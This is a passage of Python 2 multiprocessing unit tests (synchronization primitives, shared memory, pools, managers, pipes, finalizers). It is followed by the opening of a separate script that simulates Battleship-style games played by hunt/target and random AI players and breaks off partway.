time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporaily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
#self.assertEqual(event.is_set(), False)
self.assertEqual(wait(0.0), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
# self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), None)
#
#
#
class _TestValue(BaseTestCase):
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def _test(self, values):
for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if self.TYPE != 'processes':
return
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
if self.TYPE != 'processes':
return
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
def test_array(self, raw=False):
if self.TYPE != 'processes':
return
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
def test_rawarray(self):
self.test_array(raw=True)
def test_getobj_getlock_obj(self):
if self.TYPE != 'processes':
return
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
print debug_info
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
try:
from ctypes import Structure, Value, copy, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
if c_int is None:
return
x = Value('i', 7, lock=lock)
y = Value(ctypes.c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = Array('d', range(10), lock=lock)
string = Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
if c_int is None:
return
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call mutliprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = (
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.reduction', 'multiprocessing.sharedctypes',
'multiprocessing.synchronize', 'multiprocessing.util'
)
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
def _test_level(self, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
def test_invalid_handles(self):
if WIN32:
return
conn = _multiprocessing.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _multiprocessing.Connection, -1)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type[0].upper() + type[1:]
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
testcases_other = [OtherTest, TestInvalidHandle]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
from test.test_support import TestSkipped
raise TestSkipped("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
simulation1.py
|
"""
Simulate large amount of games with hunt/target and random AI, multithreaded.
"""
from core import player, hunt_ai, random_ai, field_utils
from multiprocessing import Queue, Process
import sys
def hunt_child(name, q, samples, parameters):
"""
thread for running target/hunt AI simulations
"""
print("starting:", name)
for i in range(samples):
# create dummy player and dummy cheat_list
dummy = player.Player()
cheat_list = []
# if cheating simulation, create proper cheat_list
if parameters[1]:
cheat_list = field_utils.generate_cheat_list(dummy.get_field(),
parameters[2])
# setup AI
ai = hunt_ai.Hunt_AI(parity=parameters[0], cheat=parameters[1],
cheat_input=cheat_list)
# simulate game and send results to supervisor thread
k = 0
while not dummy.has_lost():
k += 1
ai.turn(dummy)
if i % 1000 == 0:
print(name + ": " + str(i*100/samples) + "%") # progress display
if k <= 100:
q.put([name, k, i])
print(name, " exiting")
sys.exit()
def random_child(name, q, samples):
"""
thread for running random AI simulations
"""
("starting:", name)
for i in range(samples):
# setup game
dummy = player.Player()
ai = random_ai.Random_AI()
# play game and send results to supervisor thread
k = 0
while not dummy.has_lost():
k += 1
ai.turn(dummy)
if i % 1000 == 0:
print(name + ": " + str(i*100/samples) + "%") # progress display
if k <= 100:
q.put([name, k, i])
print(name, " exiting")
sys.exit()
def supervisor(name, q, samples, threads):
"""
Supervisor thread.
Stores results, after simulations are done, saves them to .txt files.
"""
print("Starting:", name)
# prepare dict for storing results and status watching list
results_dict = {}
current = []
# while any simulation still running, check queue for results
while not sum(current) == threads:
while not q.empty():
data = q.get()
# if simulation finished, add that information to "current" list
if data[2] == samples-1:
current.append(True)
# sort results by parameters of the simulation
if data[0] in list(results_dict.keys()):
results_dict[data[0]][data[1]] += 1
else:
results_dict[data[0]] = [0 for x in range(101)]
results_dict[data[0]][data[1]] += 1
# save results to individual files, named by parameters of simulation
print(name, " saving to files")
for key in list(results_dict.keys()):
f = open("results/"+str(key)+".txt", "w")
for number in results_dict[key]:
f.write(str(number)+"\n")
f.close()
print(name, " exiting")
sys.exit()
def main():
samples = 1000000 # number of games simulated per thread
q = Queue(maxsize=0)
threads_each = 1 # number of threads for every parameter variant
# parameter variants of target/hunt AI to run
parameters = ((False, False, 0), (False, True, 1), (False, True, 2),
